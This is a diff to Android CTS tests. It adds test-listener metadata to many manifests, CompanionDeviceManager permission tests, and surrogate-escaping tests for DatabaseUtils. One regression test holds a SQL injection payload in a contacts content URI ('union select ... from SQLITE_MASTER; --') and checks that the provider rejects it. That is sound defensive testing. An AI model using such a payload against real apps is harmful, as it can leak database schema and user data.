                      android:label="CTS tests for car builtin api">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/tests/carrierapi/AndroidManifest.xml b/tests/tests/carrierapi/AndroidManifest.xml
index 0c2f4dc..52057ac 100644
--- a/tests/tests/carrierapi/AndroidManifest.xml
+++ b/tests/tests/carrierapi/AndroidManifest.xml
@@ -30,6 +30,8 @@
 
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.carrierapi.cts">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/classloaderfactory/test-memcl/AndroidManifest.xml b/tests/tests/classloaderfactory/test-memcl/AndroidManifest.xml
index 9283a6c..5478303 100644
--- a/tests/tests/classloaderfactory/test-memcl/AndroidManifest.xml
+++ b/tests/tests/classloaderfactory/test-memcl/AndroidManifest.xml
@@ -29,6 +29,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.app.classloaderfactory.memcl.cts"
                      android:label="CTS tests of android.app">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/classloaderfactory/test-pathcl/AndroidManifest.xml b/tests/tests/classloaderfactory/test-pathcl/AndroidManifest.xml
index 92be6d6..b2e8b75 100644
--- a/tests/tests/classloaderfactory/test-pathcl/AndroidManifest.xml
+++ b/tests/tests/classloaderfactory/test-pathcl/AndroidManifest.xml
@@ -29,6 +29,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.app.componentfactory.pathcl.cts"
                      android:label="CTS tests of android.app">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/colormode/AndroidManifest.xml b/tests/tests/colormode/AndroidManifest.xml
index f88c7cd..48971af 100644
--- a/tests/tests/colormode/AndroidManifest.xml
+++ b/tests/tests/colormode/AndroidManifest.xml
@@ -31,6 +31,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
             android:targetPackage="android.colormode.cts"
             android:label="Tests for the Color Mode APIs." >
+        <meta-data android:name="listener"
+                android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/companion/core/AndroidManifest.xml b/tests/tests/companion/core/AndroidManifest.xml
index f24a164..048558a 100644
--- a/tests/tests/companion/core/AndroidManifest.xml
+++ b/tests/tests/companion/core/AndroidManifest.xml
@@ -23,6 +23,9 @@
         android:targetPackage="android.companion.cts.core"
         android:label="CompanionDeviceManager Core CTS tests">
 
+        <meta-data
+            android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/companion/core/src/android/companion/cts/core/TransportPermissionTest.kt b/tests/tests/companion/core/src/android/companion/cts/core/TransportPermissionTest.kt
new file mode 100644
index 0000000..8aa26b2
--- /dev/null
+++ b/tests/tests/companion/core/src/android/companion/cts/core/TransportPermissionTest.kt
@@ -0,0 +1,121 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.companion.cts.core
+
+import android.Manifest
+import android.companion.AssociationInfo
+import android.companion.CompanionDeviceManager.MESSAGE_REQUEST_PING
+import android.companion.CompanionDeviceManager.OnMessageReceivedListener
+import android.companion.CompanionDeviceManager.OnTransportsChangedListener
+import android.companion.cts.common.MAC_ADDRESS_A
+import android.companion.cts.common.SIMPLE_EXECUTOR
+import android.platform.test.annotations.AppModeFull
+import androidx.test.ext.junit.runners.AndroidJUnit4
+import kotlin.test.assertFailsWith
+import org.junit.Test
+import org.junit.runner.RunWith
+
+/**
+ * Test System APIs for using CDM transports.
+ *
+ * Run: atest CtsCompanionDeviceManagerCoreTestCases:TransportPermissionTest
+ */
+@AppModeFull(reason = "CompanionDeviceManager APIs are not available to the instant apps.")
+@RunWith(AndroidJUnit4::class)
+class TransportPermissionTest : CoreTestBase() {
+
+    @Test
+    fun test_addOnTransportChangedListener_requiresPermission() {
+        // Create a regular (not self-managed) association.
+        targetApp.associate(MAC_ADDRESS_A)
+        val listener = OnTransportsChangedListener { _: MutableList<AssociationInfo> -> }
+
+        // Attempts to call addOnTransportChangedListener without the
+        // USE_COMPANION_TRANSPORTS permission should lead to a SecurityException
+        // being thrown.
+        assertFailsWith(SecurityException::class) {
+            cdm.addOnTransportsChangedListener(SIMPLE_EXECUTOR, listener)
+        }
+
+        // Same call with the USE_COMPANION_TRANSPORTS permissions should succeed.
+        withShellPermissionIdentity(Manifest.permission.USE_COMPANION_TRANSPORTS) {
+            cdm.addOnTransportsChangedListener(SIMPLE_EXECUTOR, listener)
+        }
+
+        // Attempts to call removeOnTransportChangedListener without the
+        // USE_COMPANION_TRANSPORTS permission should lead to a SecurityException
+        // being thrown.
+        assertFailsWith(SecurityException::class) {
+            cdm.removeOnTransportsChangedListener(listener)
+        }
+
+        // Same call with the USE_COMPANION_TRANSPORTS permissions should succeed.
+        withShellPermissionIdentity(Manifest.permission.USE_COMPANION_TRANSPORTS) {
+            cdm.removeOnTransportsChangedListener(listener)
+        }
+    }
+
+    @Test
+    fun test_addOnMessageReceivedListener_requiresPermission() {
+        // Create a regular (not self-managed) association.
+        targetApp.associate(MAC_ADDRESS_A)
+        val listener = OnMessageReceivedListener { _: Int, _: ByteArray -> }
+
+        // Attempts to call addOnMessageReceivedListener without the
+        // USE_COMPANION_TRANSPORTS permission should lead to a SecurityException
+        // being thrown.
+        assertFailsWith(SecurityException::class) {
+            cdm.addOnMessageReceivedListener(SIMPLE_EXECUTOR, MESSAGE_REQUEST_PING, listener)
+        }
+
+        // Same call with the USE_COMPANION_TRANSPORTS permissions should succeed.
+        withShellPermissionIdentity(Manifest.permission.USE_COMPANION_TRANSPORTS) {
+            cdm.addOnMessageReceivedListener(SIMPLE_EXECUTOR, MESSAGE_REQUEST_PING, listener)
+        }
+
+        // Attempts to call removeOnMessageReceivedListener without the
+        // USE_COMPANION_TRANSPORTS permission should lead to a SecurityException
+        // being thrown.
+        assertFailsWith(SecurityException::class) {
+            cdm.removeOnMessageReceivedListener(MESSAGE_REQUEST_PING, listener)
+        }
+
+        // Same call with the USE_COMPANION_TRANSPORTS permissions should succeed.
+        withShellPermissionIdentity(Manifest.permission.USE_COMPANION_TRANSPORTS) {
+            cdm.removeOnMessageReceivedListener(MESSAGE_REQUEST_PING, listener)
+        }
+    }
+
+    @Test
+    fun test_sendMessage_requiresPermission() {
+        // Create a regular (not self-managed) association.
+        targetApp.associate(MAC_ADDRESS_A)
+        val associationId = cdm.myAssociations[0].id
+
+        // Attempts to call sendMessage without the
+        // USE_COMPANION_TRANSPORTS  permission should lead to a SecurityException
+        // being thrown.
+        assertFailsWith(SecurityException::class) {
+            cdm.sendMessage(MESSAGE_REQUEST_PING, byteArrayOf(), intArrayOf(associationId))
+        }
+
+        // Same call with the USE_COMPANION_TRANSPORTS permissions should succeed.
+        withShellPermissionIdentity(Manifest.permission.USE_COMPANION_TRANSPORTS) {
+            cdm.sendMessage(MESSAGE_REQUEST_PING, byteArrayOf(), intArrayOf(associationId))
+        }
+    }
+}
diff --git a/tests/tests/companion/noservices/AndroidManifest.xml b/tests/tests/companion/noservices/AndroidManifest.xml
index f5c4b9d..a851ff4 100644
--- a/tests/tests/companion/noservices/AndroidManifest.xml
+++ b/tests/tests/companion/noservices/AndroidManifest.xml
@@ -23,6 +23,9 @@
         android:targetPackage="android.companion.cts.noservices"
         android:label="CompanionDeviceManager No-CompanionDeviceServices CTS tests">
 
+        <meta-data
+            android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
     <application>
diff --git a/tests/tests/companion/uiautomation/AndroidManifest.xml b/tests/tests/companion/uiautomation/AndroidManifest.xml
index 3603685..96355ff 100644
--- a/tests/tests/companion/uiautomation/AndroidManifest.xml
+++ b/tests/tests/companion/uiautomation/AndroidManifest.xml
@@ -27,6 +27,9 @@
         android:targetPackage="android.companion.cts.uiautomation"
         android:label="CompanionDeviceManager UiAutomation CTS tests">
 
+        <meta-data
+            android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
     <application>
diff --git a/tests/tests/contactsprovider/AndroidManifest.xml b/tests/tests/contactsprovider/AndroidManifest.xml
index 3e4f150..e8ee353 100644
--- a/tests/tests/contactsprovider/AndroidManifest.xml
+++ b/tests/tests/contactsprovider/AndroidManifest.xml
@@ -58,6 +58,8 @@
 
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.provider.cts.contacts">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/contactsprovider/src/android/provider/cts/contacts/ContactsContract_DirectoryTest.java b/tests/tests/contactsprovider/src/android/provider/cts/contacts/ContactsContract_DirectoryTest.java
index d800206..39d798f 100644
--- a/tests/tests/contactsprovider/src/android/provider/cts/contacts/ContactsContract_DirectoryTest.java
+++ b/tests/tests/contactsprovider/src/android/provider/cts/contacts/ContactsContract_DirectoryTest.java
@@ -99,6 +99,17 @@
         return -1;
     }
 
+    public void testSqlInjection() throws Exception {
+        Cursor cursor = getContext()
+                .getContentResolver()
+                .query(Uri.parse("content://contacts/phones/filter/test\uD83D',1))))"
+                                + " union select type,name,tbl_name,"
+                                + "rootpage,sql from SQLITE_MASTER; --"),
+                        new String[]{"starred", "number", "person",
+                                "last_time_contacted", "number_key"}, null, null);
+        assertFalse(cursor.moveToFirst());
+    }
+
     public void testQueryParameters() throws Exception {
         // Test for content types.
         assertEquals(Directory.CONTENT_TYPE, mResolver.getType(Directory.CONTENT_URI));
diff --git a/tests/tests/contactsproviderwipe/AndroidManifest.xml b/tests/tests/contactsproviderwipe/AndroidManifest.xml
index e0b10f3..deab721 100644
--- a/tests/tests/contactsproviderwipe/AndroidManifest.xml
+++ b/tests/tests/contactsproviderwipe/AndroidManifest.xml
@@ -27,6 +27,8 @@
 
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
         android:targetPackage="android.provider.cts.contactsproviderwipe">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/tests/content/AndroidManifest.xml b/tests/tests/content/AndroidManifest.xml
index 329ce05..075834c 100644
--- a/tests/tests/content/AndroidManifest.xml
+++ b/tests/tests/content/AndroidManifest.xml
@@ -625,6 +625,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.content.cts"
          android:label="CTS tests of android.content">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
     <instrumentation android:name="android.content.pm.cts.TestPmInstrumentation"
diff --git a/tests/tests/content/src/android/content/res/cts/ResourceNameTest.java b/tests/tests/content/src/android/content/res/cts/ResourceNameTest.java
index dcf9410..0a6bea6 100644
--- a/tests/tests/content/src/android/content/res/cts/ResourceNameTest.java
+++ b/tests/tests/content/src/android/content/res/cts/ResourceNameTest.java
@@ -16,11 +16,12 @@
 
 package android.content.res.cts;
 
-import android.content.cts.R;
 import android.content.res.Resources;
 import android.test.AndroidTestCase;
 import android.test.suitebuilder.annotation.SmallTest;
 
+import android.content.cts.R;
+
 public class ResourceNameTest extends AndroidTestCase {
 
     @SmallTest
diff --git a/tests/tests/database/AndroidManifest.xml b/tests/tests/database/AndroidManifest.xml
index d4c0b2a..f47753d 100644
--- a/tests/tests/database/AndroidManifest.xml
+++ b/tests/tests/database/AndroidManifest.xml
@@ -32,6 +32,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.database.cts"
                      android:label="CTS tests of android.database">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/database/src/android/database/cts/DatabaseUtilsTest.java b/tests/tests/database/src/android/database/cts/DatabaseUtilsTest.java
index a35a6ac..cef5441 100644
--- a/tests/tests/database/src/android/database/cts/DatabaseUtilsTest.java
+++ b/tests/tests/database/src/android/database/cts/DatabaseUtilsTest.java
@@ -75,6 +75,134 @@
         super.tearDown();
     }
 
+    public void testHighSurrogateStartInvalid() {
+        String expected = "name=''";
+        StringBuilder sb = new StringBuilder("name=");
+
+        DatabaseUtils.appendEscapedSQLString(sb, "\uD83D");
+        assertEquals(expected, sb.toString());
+    }
+
+    public void testDoubleHighSurrogateStart() {
+        String expected = "name=''";
+        StringBuilder sb = new StringBuilder("name=");
+
+        DatabaseUtils.appendEscapedSQLString(sb, "\uD83D\uD83D");
+        assertEquals(expected, sb.toString());
+    }
+
+    public void testHighSurrogatePairInvalid() {
+        String expected = "name=''''";
+        StringBuilder sb = new StringBuilder("name=");
+
+        DatabaseUtils.appendEscapedSQLString(sb, "\uD83D\'");
+        assertEquals(expected, sb.toString());
+    }
+
+    public void testValidSurrogate() {
+        String expected = "name='\uD83D\uDC00'";
+        StringBuilder sb = new StringBuilder("name=");
+
+        DatabaseUtils.appendEscapedSQLString(sb, "\uD83D" + "\uDC00");
+        assertEquals(expected, sb.toString());
+    }
+
+    public void testReversedSurrogate() {
+        String expected = "name=''";
+        StringBuilder sb = new StringBuilder("name=");
+
+        DatabaseUtils.appendEscapedSQLString(sb, "\uDC00" + "\uD83D");
+        assertEquals(expected, sb.toString());
+    }
+
+    public void testValidDoubleSurrogate() {
+        String expected = "name='\uD83D\uDC00\uD8FF\uDC01'";
+        StringBuilder sb = new StringBuilder("name=");
+
+        DatabaseUtils.appendEscapedSQLString(sb, "\uD83D\uDC00\uD8FF\uDC01");
+        assertEquals(expected, sb.toString());
+    }
+
+    public void testValidDoubleSurrogateWithStringMixed() {
+        String expected = "name='Joh\uD83D\uDC00nn\uD8FF\uDC01y'";
+        StringBuilder sb = new StringBuilder("name=");
+
+        DatabaseUtils.appendEscapedSQLString(sb, "Joh\uD83D\uDC00nn\uD8FF\uDC01y");
+        assertEquals(expected, sb.toString());
+    }
+
+    public void testInvalidDoubleSurrogateWithStringMixed() {
+        String expected = "name='Johnn\uD8FF\uDC01y'";
+        StringBuilder sb = new StringBuilder("name=");
+
+        DatabaseUtils.appendEscapedSQLString(sb, "Joh\uD83Dn\uDC00n\uD8FF\uDC01y");
+        assertEquals(expected, sb.toString());
+    }
+
+    public void testHighLowLowSurrogate() {
+        String expected = "name='\uD83D\uDC00'";
+        StringBuilder sb = new StringBuilder("name=");
+
+        DatabaseUtils.appendEscapedSQLString(sb, "\uD83D\uDC00\uDC01");
+        assertEquals(expected, sb.toString());
+    }
+
+    public void testHighLowLowSurrogateWithString_AtEnd() {
+        String expected = "name='Johnny\uD83D\uDC00'";
+        StringBuilder sb = new StringBuilder("name=");
+
+        DatabaseUtils.appendEscapedSQLString(sb, "Johnny\uD83D\uDC00\uDC01");
+        assertEquals(expected, sb.toString());
+    }
+
+    public void testHighLowLowSurrogateWithString_AtMiddle() {
+        String expected = "name='Jo\uD83D\uDC00hnny'";
+        StringBuilder sb = new StringBuilder("name=");
+
+        DatabaseUtils.appendEscapedSQLString(sb, "Jo\uD83D\uDC00\uDC01hnny");
+        assertEquals(expected, sb.toString());
+    }
+
+    public void testHighLowLowSurrogateWithString_AtStart() {
+        String expected = "name='\uD83D\uDC00Johnny'";
+        StringBuilder sb = new StringBuilder("name=");
+
+        DatabaseUtils.appendEscapedSQLString(sb, "\uD83D\uDC00\uDC01Johnny");
+        assertEquals(expected, sb.toString());
+    }
+
+    public void testLowSurrogateInvalid() {
+        String expected = "name=''";
+        StringBuilder sb = new StringBuilder("name=");
+
+        DatabaseUtils.appendEscapedSQLString(sb, "\uDC00");
+        assertEquals(expected, sb.toString());
+    }
+
+    public void testLowSurrogateInvalidWholeString_AtEnd() {
+        String expected = "name='Johnny'";
+        StringBuilder sb = new StringBuilder("name=");
+
+        DatabaseUtils.appendEscapedSQLString(sb, "Johnny\uDC00");
+        assertEquals(expected, sb.toString());
+    }
+
+    public void testLowSurrogateInvalidWholeString_AtStart() {
+        String expected = "name='Johnny'''";
+        StringBuilder sb = new StringBuilder("name=");
+
+        DatabaseUtils.appendEscapedSQLString(sb, "\uDC00Johnny'");
+        assertEquals(expected, sb.toString());
+    }
+
+    public void testLowSurrogateInvalidWholeString_AtMiddle() {
+        String expected = "name='Johnny'''";
+        StringBuilder sb = new StringBuilder("name=");
+
+        DatabaseUtils.appendEscapedSQLString(sb, "Joh\uDC00nny'");
+        assertEquals(expected, sb.toString());
+    }
+
     public void testAppendEscapedSQLString() {
         String expected = "name='Mike'";
         StringBuilder sb = new StringBuilder("name=");
diff --git a/tests/tests/deviceconfig/AndroidManifest.xml b/tests/tests/deviceconfig/AndroidManifest.xml
index b3790ea..eafb00a 100755
--- a/tests/tests/deviceconfig/AndroidManifest.xml
+++ b/tests/tests/deviceconfig/AndroidManifest.xml
@@ -31,6 +31,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.deviceconfig.cts"
                      android:label="CTS tests for DeviceConfig API">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/dpi/AndroidManifest.xml b/tests/tests/dpi/AndroidManifest.xml
index 79d32a3..5457d92 100644
--- a/tests/tests/dpi/AndroidManifest.xml
+++ b/tests/tests/dpi/AndroidManifest.xml
@@ -30,5 +30,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.dpi.cts"
                      android:label="CTS tests for DPI">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/dpi2/AndroidManifest.xml b/tests/tests/dpi2/AndroidManifest.xml
index 8562aa2f..28b5579 100644
--- a/tests/tests/dpi2/AndroidManifest.xml
+++ b/tests/tests/dpi2/AndroidManifest.xml
@@ -30,5 +30,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.dpi2.cts"
                      android:label="CTS tests for DPI">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/dreams/AndroidManifest.xml b/tests/tests/dreams/AndroidManifest.xml
index 71e2a68..1011f84 100644
--- a/tests/tests/dreams/AndroidManifest.xml
+++ b/tests/tests/dreams/AndroidManifest.xml
@@ -27,6 +27,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.dreams.cts"
                      android:label="CTS tests for the android.service.dreams package">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/drm/AndroidManifest.xml b/tests/tests/drm/AndroidManifest.xml
index 127705f..5d8bb7e 100644
--- a/tests/tests/drm/AndroidManifest.xml
+++ b/tests/tests/drm/AndroidManifest.xml
@@ -24,6 +24,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.drm.cts"
                      android:label="CTS tests of android.drm">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/effect/AndroidManifest.xml b/tests/tests/effect/AndroidManifest.xml
index eeeae51..5323fe6 100644
--- a/tests/tests/effect/AndroidManifest.xml
+++ b/tests/tests/effect/AndroidManifest.xml
@@ -25,6 +25,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.effect.cts"
                      android:label="CTS tests of android.media.effect component">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/gamemanager/AndroidManifest.xml b/tests/tests/gamemanager/AndroidManifest.xml
index e2dbbe0..8623cc8 100644
--- a/tests/tests/gamemanager/AndroidManifest.xml
+++ b/tests/tests/gamemanager/AndroidManifest.xml
@@ -44,5 +44,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.gamemanager.cts"
          android:label="CTS tests of android Game Manager service">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/tests/tests/gameservice/AndroidManifest.xml b/tests/tests/gameservice/AndroidManifest.xml
index 29e5d19..26dcfd8 100644
--- a/tests/tests/gameservice/AndroidManifest.xml
+++ b/tests/tests/gameservice/AndroidManifest.xml
@@ -68,6 +68,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.gameservice.cts"
                      android:label="CTS tests for Android Game Service">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/graphics/AndroidManifest.xml b/tests/tests/graphics/AndroidManifest.xml
index 08ac518..c0ae49f 100644
--- a/tests/tests/graphics/AndroidManifest.xml
+++ b/tests/tests/graphics/AndroidManifest.xml
@@ -101,6 +101,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.graphics.cts"
          android:label="CTS tests of android.graphics">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/hardware/AndroidManifest.xml b/tests/tests/hardware/AndroidManifest.xml
index 4512fe5..9660e87 100644
--- a/tests/tests/hardware/AndroidManifest.xml
+++ b/tests/tests/hardware/AndroidManifest.xml
@@ -129,6 +129,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.hardware.cts"
                      android:label="CTS hardware tests">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/hibernation/AndroidManifest.xml b/tests/tests/hibernation/AndroidManifest.xml
index bf8d8d3..80ccd37 100644
--- a/tests/tests/hibernation/AndroidManifest.xml
+++ b/tests/tests/hibernation/AndroidManifest.xml
@@ -23,6 +23,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.hibernation.cts"
          android:label="CTS tests of android.hibernation">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/icu/icu4c_testapp/AndroidManifest.xml b/tests/tests/icu/icu4c_testapp/AndroidManifest.xml
index 134f265..c2051b4 100644
--- a/tests/tests/icu/icu4c_testapp/AndroidManifest.xml
+++ b/tests/tests/icu/icu4c_testapp/AndroidManifest.xml
@@ -24,5 +24,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.icu4c.cts"
                      android:label="CTS tests for ICU4C">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
\ No newline at end of file
diff --git a/tests/tests/identity/AndroidManifest.xml b/tests/tests/identity/AndroidManifest.xml
index 31fb920..7dcb297 100644
--- a/tests/tests/identity/AndroidManifest.xml
+++ b/tests/tests/identity/AndroidManifest.xml
@@ -26,6 +26,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.security.identity.cts"
                      android:label="CTS tests of android.security.identity.cts">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/jni/AndroidManifest.xml b/tests/tests/jni/AndroidManifest.xml
index 0a773bd..4a534db 100644
--- a/tests/tests/jni/AndroidManifest.xml
+++ b/tests/tests/jni/AndroidManifest.xml
@@ -27,6 +27,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.jni.cts"
                      android:label="CTS tests of calling native code via JNI">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/jvmti/attaching/AndroidManifest.xml b/tests/tests/jvmti/attaching/AndroidManifest.xml
index c47ad83..9e61bcd 100644
--- a/tests/tests/jvmti/attaching/AndroidManifest.xml
+++ b/tests/tests/jvmti/attaching/AndroidManifest.xml
@@ -25,6 +25,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.jmvti.attaching.cts"
                      android:label="CTS tests for attaching jvmti agents from inside the app">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/tests/keystore/AndroidManifest.xml b/tests/tests/keystore/AndroidManifest.xml
index 447c726..f97fd16 100644
--- a/tests/tests/keystore/AndroidManifest.xml
+++ b/tests/tests/keystore/AndroidManifest.xml
@@ -28,6 +28,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.keystore.cts"
                      android:label="CTS tests of android.keystore.cts">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/libcoreapievolution/AndroidManifest.xml b/tests/tests/libcoreapievolution/AndroidManifest.xml
index d7c4395..f89f5fd 100644
--- a/tests/tests/libcoreapievolution/AndroidManifest.xml
+++ b/tests/tests/libcoreapievolution/AndroidManifest.xml
@@ -25,6 +25,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.apievolution.cts"
                      android:label="CTS tests for required method signatures on device">
+        <meta-data android:name="listener"
+                   android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/libcorefileio/AndroidManifest.xml b/tests/tests/libcorefileio/AndroidManifest.xml
index c6a95b5..7ef7c14 100644
--- a/tests/tests/libcorefileio/AndroidManifest.xml
+++ b/tests/tests/libcorefileio/AndroidManifest.xml
@@ -38,6 +38,8 @@
 
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.libcorefileio.cts">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/libcorelegacy22/AndroidManifest.xml b/tests/tests/libcorelegacy22/AndroidManifest.xml
index fb82240..98478e4 100644
--- a/tests/tests/libcorelegacy22/AndroidManifest.xml
+++ b/tests/tests/libcorelegacy22/AndroidManifest.xml
@@ -27,6 +27,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.libcorelegacy22.cts"
                      android:label="CTS tests of android APIs last available in API 22">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/tests/libnativehelper/AndroidManifest.xml b/tests/tests/libnativehelper/AndroidManifest.xml
index f2ec251..01f1c5e 100644
--- a/tests/tests/libnativehelper/AndroidManifest.xml
+++ b/tests/tests/libnativehelper/AndroidManifest.xml
@@ -24,5 +24,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.libnativehelper.cts"
                      android:label="CTS tests of android.libnativehelper">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/libthermalndk/AndroidManifest.xml b/tests/tests/libthermalndk/AndroidManifest.xml
index c4521a1..eb6eb22 100644
--- a/tests/tests/libthermalndk/AndroidManifest.xml
+++ b/tests/tests/libthermalndk/AndroidManifest.xml
@@ -24,5 +24,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
             android:targetPackage="android.thermal.cts"
             android:label="CTS Thermal tests of android.thermal" >
+        <meta-data
+            android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/tests/match_flags/AndroidManifest.xml b/tests/tests/match_flags/AndroidManifest.xml
index 905861e..2878bd5 100644
--- a/tests/tests/match_flags/AndroidManifest.xml
+++ b/tests/tests/match_flags/AndroidManifest.xml
@@ -27,6 +27,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                      android:targetPackage="android.matchflags.cts"
                      android:label="CTS tests for match flags">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
 
diff --git a/tests/tests/media/audio/AndroidManifest.xml b/tests/tests/media/audio/AndroidManifest.xml
index d0ca9ea..0681108 100644
--- a/tests/tests/media/audio/AndroidManifest.xml
+++ b/tests/tests/media/audio/AndroidManifest.xml
@@ -53,6 +53,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.media.audio.cts"
          android:label="CTS tests of android.media.audio">
